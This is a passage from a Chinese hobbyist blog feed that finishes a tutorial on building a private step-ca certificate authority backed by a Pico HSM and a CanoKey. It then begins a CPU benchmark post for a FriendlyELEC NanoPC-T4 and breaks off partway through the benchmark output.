pkcs11-tool --module /usr/lib/opensc-pkcs11.so -O</span><br></pre></td></tr></table></figure><p>正常的话应该会有类似这样的输出: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">Certificate Object; type = X.509 cert</span><br><span class="line"> label: Certificate for Key Management</span><br><span class="line"> subject: DN: C=CN, O=D9Lab, OU=D9Lab Zero Certificate Authority, CN=D9Lab Zero Root CA</span><br><span class="line"> serial: ************</span><br><span class="line"> ID: 03</span><br><span class="line"> uri: pkcs11:model=PKCS%2315%20emulated;manufacturer=piv_II;serial=************;token=Disappear9%20%27s%20CanoKey;id=%03;object=Certificate%20for%20Key%20Management;type=cert</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>记下这个<code>ID 03</code>,接下来会用到 </p><p>创建中间CA模板 </p><figure class="highlight json"><figcaption><span>intermediate.tpl</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"subject"</span><span class="punctuation">:</span> <span class="punctuation">{</span> <span class="punctuation">{</span> toJson .Subject <span class="punctuation">}</span> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"certSign"</span><span class="punctuation">,</span> <span class="string">"crlSign"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"basicConstraints"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"isCA"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"maxPathLen"</span><span class="punctuation">:</span> <span class="number">0</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crlDistributionPoints"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span><span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>生成中间CA私钥 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ step certificate create \</span><br><span class="line"> <span class="string">"D9Lab Zero Intermediate CA"</span> \</span><br><span class="line"> intermediate-ca.crt \</span><br><span class="line"> intermediate_ca_key_enc \</span><br><span class="line"> --template intermediate.tpl \</span><br><span class="line"> --ca root-ca.crt \</span><br><span class="line"> --ca-kms <span class="string">'pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=************?pin-value=648219'</span> \</span><br><span class="line"> --ca-key <span class="string">'pkcs11:id=03'</span> \</span><br><span class="line"> --not-before <span class="string">'2025-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --not-after <span class="string">'2030-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --kty=EC --curve=P-384</span><br></pre></td></tr></table></figure><p>拔下Canokey/YubiKey,换回Pico HSM </p> </div><div id="intermediate-ca-file" class="tab-content is-hidden"> <p>创建中间CA模板 </p><figure class="highlight json"><figcaption><span>intermediate.tpl</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"subject"</span><span class="punctuation">:</span> <span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"certSign"</span><span class="punctuation">,</span> <span class="string">"crlSign"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"basicConstraints"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"isCA"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"maxPathLen"</span><span class="punctuation">:</span> <span class="number">0</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crlDistributionPoints"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span><span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><p>生成中间CA私钥 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ step certificate create \</span><br><span class="line"> <span class="string">"D9Lab Zero Intermediate CA"</span> \</span><br><span class="line"> intermediate-ca.crt \</span><br><span class="line"> intermediate_ca_key_enc \</span><br><span class="line"> --template intermediate.tpl \</span><br><span class="line"> --ca root-ca.crt \</span><br><span class="line"> --ca-key root-ca-key.pem \</span><br><span class="line"> --not-before <span class="string">'2025-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --not-after <span class="string">'2030-01-10T00:00:00+08:00'</span> \</span><br><span class="line"> --kty=EC --curve=P-384</span><br></pre></td></tr></table></figure> </div><p>将证书和私钥打包成<code>p12</code>格式 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ openssl ec -<span class="keyword">in</span> intermediate_ca_key_enc -out intermediate-ca-key.pem</span><br><span class="line"><span class="comment"># 注意必须要设定密码,不然导入的时候会报错! </span></span><br><span class="line">$ openssl pkcs12 -<span class="built_in">export</span> -out intermediate-ca.p12 -inkey intermediate-ca-key.pem -<span class="keyword">in</span> intermediate-ca.crt -certfile root-ca.crt</span><br></pre></td></tr></table></figure><h3 id="将中间CA证书和密钥导入-pico-hsm"><a href="#将中间CA证书和密钥导入-pico-hsm" class="headerlink" title="将中间CA证书和密钥导入 pico-hsm"></a>将中间CA证书和密钥导入 pico-hsm</h3><p>首先参考 pico-hsm 作者的说明,下载并修改SCS3 tool:<br><a href="https://github.com/polhenarejos/pico-hsm/blob/master/doc/scs3.md">https://github.com/polhenarejos/pico-hsm/blob/master/doc/scs3.md</a> </p><p>然后参考 <a href="https://docs.nitrokey.com/nitrokeys/features/hsm/import-keys-certs#importing-via-the-scsh3-gui">docs.nitrokey.com</a> 导入<code>intermediate-ca.p12</code> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">Inside the unpacked directory you will find scsh3gui, which can be started using bash scsh3gui (for windows double-click on: scsh3gui.cmd).</span><br><span class="line"></span><br><span class="line">Start key-manager (File -> Keymanager)</span><br><span class="line">Right-click “Smartcard-HSM” -> create DKEK share</span><br><span class="line">Choose file location</span><br><span class="line">Choose DKEK share password</span><br><span class="line">Right-click “Smartcard-HSM” -> Initialize device</span><br><span class="line">Enter SO-PIN</span><br><span class="line">(optional) Enter label and enter URL/Host</span><br><span class="line">Select authentication method: “User PIN”</span><br><span class="line">Allow RESET RETRY COUNTER: “Resetting and unblocking PIN with SO-PIN not allowed”</span><br><span class="line">Enter and confirm User PIN</span><br><span class="line">“Select Device Key Encryption scheme” -> “DKEK shares”</span><br><span class="line">Enter number of DKEK shares: 1</span><br><span class="line">Right-click DKEK set-up in progress -> “Import DKEK share”</span><br><span class="line">Choose DKEK share file location</span><br><span class="line">Password for DKEK share</span><br><span class="line">Right-click “SmartCard-HSM” -> “Import from PKCS#12(Old)”</span><br><span class="line">Enter number of shares -> 1</span><br><span class="line">Enter file location of DKEK share</span><br><span class="line">Enter Password for DKEK share</span><br><span class="line">Select PKCS#12 container for import (Enter password)</span><br><span class="line">Select Key</span><br><span class="line">Select Name to be used (intermediate-ca)</span><br><span class="line">Import more keys, if needed</span><br></pre></td></tr></table></figure><p>导入完成后运行<code>pkcs11-tool -O</code>应该就可以看到导入的证书了</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ pkcs11-tool -O</span><br><span class="line"> Using slot 0 with a present token (0x0)</span><br><span class="line"> Certificate Object; <span class="built_in">type</span> = X.509 cert</span><br><span class="line"> label: intermediate-ca</span><br><span class="line"> subject: DN: C=CN, O=D9Lab, OU=D9Lab Zero Certificate Authority, CN=D9Lab Zero Intermediate CA</span><br><span class="line"> ID: 01</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>记下<code>ID</code>和<code>label</code>,后面要用到。 </p><p>把这些文件拿7z打个加密压缩包,密码用KeePass生成一个够长的保存,然后找个你喜欢的网盘存好或者刻张光盘放衣柜里。 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">intermediate-ca-key.pem</span><br><span class="line">intermediate-ca.crt</span><br><span class="line">intermediate-ca.p12</span><br><span class="line">pde文件(DKEK)</span><br><span class="line">root-ca-key.pem</span><br><span class="line">root-ca.crt</span><br><span class="line">root-ca.p12</span><br></pre></td></tr></table></figure><p>之后只保留<code>intermediate-ca.crt</code>和<code>root-ca.crt</code>,其余文件全部删除 </p><h3 id="配置step-ca"><a href="#配置step-ca" class="headerlink" title="配置step-ca"></a>配置step-ca</h3><p><a href="https://smallstep.com/docs/step-ca/cryptographic-protection/#pkcs-11">https://smallstep.com/docs/step-ca/cryptographic-protection/#pkcs-11</a> </p><p>初始化 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> systemctl <span class="built_in">enable</span> pcscd</span><br><span class="line">$ <span class="built_in">sudo</span> systemctl start pcscd</span><br><span class="line">$ <span class="built_in">sudo</span> useradd step</span><br><span class="line">$ <span class="built_in">sudo</span> passwd -l step</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">mkdir</span> /etc/step-ca</span><br><span class="line">$ <span class="built_in">export</span> STEPPATH=/etc/step-ca</span><br><span class="line">$ <span class="built_in">sudo</span> --preserve-env step ca init --name=<span class="string">"D9Lab Zero CA"</span> \</span><br><span class="line"> --dns=<span class="string">"ca.lab.d9lab.eu.org"</span> --address=<span class="string">":4443"</span> \</span><br><span class="line"> --provisioner=<span class="string">"disappear9@outlook.com"</span> \</span><br><span class="line"> --deployment-type standalone \</span><br><span class="line"> --remote-management</span><br><span class="line"><span class="comment"># 记好自己设置的 provisioner key</span></span><br><span class="line"></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">rm</span> /etc/step-ca/certs/*</span><br><span class="line"><span class="comment"># 将保存的 intermediate-ca.crt 和 root-ca.crt 复制到/etc/step-ca/certs/</span></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">rm</span> -rf /etc/step-ca/secrets</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">chown</span> -R step:step /etc/step-ca</span><br><span class="line">$ step kms create --json --kms <span class="string">"pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=ESPICOHSMTR?pin-value=648219"</span> <span class="string">"pkcs11:id=2000;object=ssh-host-ca"</span></span><br><span class="line">$ step kms create --json --kms <span class="string">"pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=ESPICOHSMTR?pin-value=648219"</span> <span class="string">"pkcs11:id=2001;object=ssh-user-ca"</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>编辑<code>/etc/step-ca/config/ca.json</code> </p><figure class="highlight json"><figcaption><span>ca.json</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"root"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/certs/root-ca.crt"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crt"</span><span class="punctuation">:</span> <span class="string">"/etc/step-ca/certs/intermediate-ca.crt"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"key"</span><span class="punctuation">:</span> <span class="string">"pkcs11:id=01;object=intermediate-ca"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"kms"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"type"</span><span class="punctuation">:</span> <span class="string">"pkcs11"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"uri"</span><span class="punctuation">:</span> <span class="string">"pkcs11:module-path=/usr/lib/opensc-pkcs11.so;serial=ESPICOHSMTR?pin-value=648219"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"ssh"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"hostKey"</span><span class="punctuation">:</span> <span class="string">"pkcs11:id=2000;object=ssh-host-ca"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"userKey"</span><span class="punctuation">:</span> <span class="string">"pkcs11:id=2001;object=ssh-user-ca"</span></span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line"><span class="punctuation">}</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>尝试运行 </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 新开一个窗口</span></span><br><span class="line">$ screen</span><br><span class="line">$ <span class="built_in">sudo</span> -u step step-ca /etc/step-ca/config/ca.json</span><br><span class="line"><span class="comment"># 记下fingerprint值,下面会用到</span></span><br></pre></td></tr></table></figure><p>新开一个窗口</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">unset</span> STEPPATH</span><br><span class="line">$ step ca bootstrap --ca-url <span class="string">"https://ca.lab.d9lab.eu.org:4443"</span> --fingerprint d6b3b9ef79a42aeeabcd5580b2b516458ddb25d1af4ea7ff0845e624ec1bb609</span><br><span class="line">The root certificate has been saved <span class="keyword">in</span> /home/disappear9/.step/certs/root_ca.crt.</span><br><span class="line">The authority configuration has been saved <span class="keyword">in</span> /home/disappear9/.step/config/defaults.json.</span><br><span class="line"></span><br><span class="line"><span class="comment"># 来测试一下能不能正常签出证书</span></span><br><span class="line">$ step ca certificate <span class="string">"localhost"</span> localhost.crt localhost.key</span><br><span class="line">$ step ca provisioner add acme --<span class="built_in">type</span> acme --admin-name step</span><br></pre></td></tr></table></figure><h3 id="配置服务"><a href="#配置服务" class="headerlink" title="配置服务"></a>配置服务</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">tee</span> /etc/udev/rules.d/75-picohsm.rules > /dev/null << <span class="string">EOF</span></span><br><span class="line"><span class="string">ACTION=="add", SUBSYSTEM=="usb", ENV{PRODUCT}=="20a0/4230/*", TAG+="systemd", SYMLINK+="picohsm"</span></span><br><span class="line"><span class="string">ACTION=="remove", SUBSYSTEM=="usb", ENV{PRODUCT}=="20a0/4230/*", TAG+="systemd"</span></span><br><span class="line"><span class="string">EOF</span></span><br><span class="line">$ <span class="built_in">sudo</span> udevadm control --reload-rules</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">tee</span> /etc/systemd/system/step-ca.service > /dev/null << <span class="string">EOF</span></span><br><span class="line"><span class="string">[Unit]</span></span><br><span class="line"><span class="string">Description=step-ca</span></span><br><span class="line"><span class="string">BindsTo=dev-picohsm.device</span></span><br><span class="line"><span class="string">After=dev-picohsm.device</span></span><br><span class="line"><span class="string">[Service]</span></span><br><span class="line"><span class="string">User=step</span></span><br><span class="line"><span class="string">Group=step</span></span><br><span class="line"><span class="string">ExecStart=/bin/sh -c '/usr/local/bin/step-ca /etc/step-ca/config/ca.json'</span></span><br><span class="line"><span class="string">Type=simple</span></span><br><span class="line"><span class="string">Restart=on-failure</span></span><br><span class="line"><span class="string">RestartSec=10</span></span><br><span class="line"><span class="string">[Install]</span></span><br><span class="line"><span class="string">WantedBy=multi-user.target</span></span><br><span class="line"><span class="string">EOF</span></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">mkdir</span> /etc/systemd/system/dev-picohsm.device.wants</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">ln</span> -s /etc/systemd/system/step-ca.service /etc/systemd/system/dev-picohsm.device.wants/</span><br><span class="line">$ <span class="built_in">sudo</span> systemctl daemon-reload</span><br><span class="line">$ <span class="built_in">sudo</span> systemctl <span class="built_in">enable</span> step-ca</span><br><span class="line">$ <span class="built_in">sudo</span> init 6</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看服务运行状态</span></span><br><span class="line">$ systemctl status step-ca</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>(完)</p>]]></content>
<summary type="html"><h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h3><p>前几天在Canokey群看到一个软件:<a href="https://github.com/smallstep/certificates">step-ca</a><br>简单说就是用这个软件可以自建一个CA来玩,而且软件支持HSM设备</p>
<hr>
<h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>环境确认</h3><p>硬件信息:<br>&emsp;&emsp;OrangePi Zero3<br>&emsp;&emsp;Raspberry Pi Pico2<br>操作系统:<br>&emsp;&emsp;Armbian v25.11.2 6.12.58-current-sunxi64<br>软件版本:<br>&emsp;&emsp;go1.25.5<br>&emsp;&emsp;step-ca 0.29.0<br>&emsp;&emsp;OpenSC 0.26.1 </p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>友善 FriendlyELEC NanoPC-T4 CPU跑分测试 CPU Benchmark</title>
<link href="https://thinkalone.win/NanoPC-T4-CPU-Benchmark.html"/>
<id>https://thinkalone.win/NanoPC-T4-CPU-Benchmark.html</id>
<published>2025-09-30T04:00:00.000Z</published>
<updated>2025-09-30T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:Rockchip RK3399<br>RAM:4G </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@nanopct4</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P"" """Y$$.". Kernel: aarch64 Linux 6.12.44-current-rockchip64</span><br><span class="line"> ,$$P' `$$$. Uptime: 15m</span><br><span class="line">',$$P ,ggs. `$$b: Packages: 366</span><br><span class="line">`d$$' ,$P"' . $$$ Shell: bash</span><br><span class="line"> $$P d$' , $$P Disk: 4.8G / 485G (2%)</span><br><span class="line"> $$: $$. - ,d$$' CPU: ARM Cortex-A53 Cortex-A72 @ 6x 1.416GHz</span><br><span class="line"> $$\; Y$b._ _,d$P' RAM: 4G</span><br><span class="line"> Y$$. `.`"Y$$$$P"'</span><br><span class="line"> `$$b "-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `"Y$b._</span><br><span class="line"> `""""</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 16.02:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">disappear9@nanopct4:~$ 7z b -mmt6</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,6 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 64000000 64000000 - - - - - - -</span><br><span class="line"></span><br><span class="line">RAM size: 3852 MB, # CPU hardware threads: 6</span><br><span class="line">RAM usage: 1323 MB, # Benchmark threads: 6</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 4995 493 986 4860 | 93784 520 1538 7998</span><br><span class="line">23: 4735 503 960 4825 | 91755 520 1527 7940</span><br><span class="line">24: 4721 542 937 5077 | 89873 520 1517 7888</span><br><span class="line">25: 4656 574 926 5316 | 87341 519 1497 7773</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 528 952 5019 | 520 1520 7900</span><br><span class="line">Tot: 524 1236 6460</span><br><span class="line">disappear9@nanopct4:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,6 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: - - - - - - 512000000 1024000000 -</span><br><span class="line"></span><br><span class="line">RAM size: 3852 MB, # CPU hardware threads: 6</span><br><span class="line">RAM usage: 435 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 1629 99 1598 1585 | 22693 100 1943 1938</span><br><span class="line">23: 1535 99 1579 1565 | 22323 100 1938 1932</span><br><span class="line">24: 1466 99 1590 1576 | 21931 100 1931 1925</span><br><span class="line">25: 1355 99 1562 1548 | 21440 100 1915 1908</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 99 1582 1568 | 100 1932 1926</span><br><span class="line">Tot: 99 1757 1747</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>phoronix-test-suite benchmark compress-7zip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line">disappear9@nanopct4:~$ ./phoronix-test-suite benchmark compress-7zip</span><br><span class="line"></span><br><span class="line"> pts/compress-7zip-1.12.0:</span><br><span class="line"></span><br><span class="line">System Information</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> PROCESSOR: ARMv8 Cortex-A72 @ 1.42GHz</span><br><span class="line"> Core Count: 4</span><br><span class="line"> Thread Count: 6</span><br><span class="line"> Scaling Driver: cpufreq-dt ondemand</span><br><span class="line"></span><br><span class="line"> GRAPHICS:</span><br><span class="line"></span><br><span class="line"> MOTHERBOARD: FriendlyElec NanoPC-T4</span><br><span class="line"> Chipset: Rockchip RK3399</span><br><span class="line"></span><br><span class="line"> MEMORY: 4096MB</span><br><span class="line"></span><br><span class="line"> DISK: 512GB SK hynix HFS512GDE9X084N + 16GB AJTD4R</span><br><span class="line"> File-System: ext4</span><br><span class="line"> Mount Options: commit=120 errors=remount-ro noatime rw</span><br><span class="line"> Disk Scheduler: NONE</span><br><span class="line"> Disk Details: Block Size: 4096</span><br><span class="line"></span><br><span class="line"> OPERATING SYSTEM: Debian 12</span><br><span class="line"> Kernel: 6.12.44-current-rockchip64 (aarch64)</span><br><span class="line"> Compiler: GCC 12.2.0</span><br><span class="line"> Security: gather_data_sampling: Not affected</span><br><span class="line"> + indirect_target_selection: Not affected</span><br><span class="line"> + itlb_multihit: Not affected</span><br><span class="line"> + l1tf: Not affected</span><br><span class="line"> + mds: Not affected</span><br><span class="line"> + meltdown: Not affected</span><br><span class="line"> + 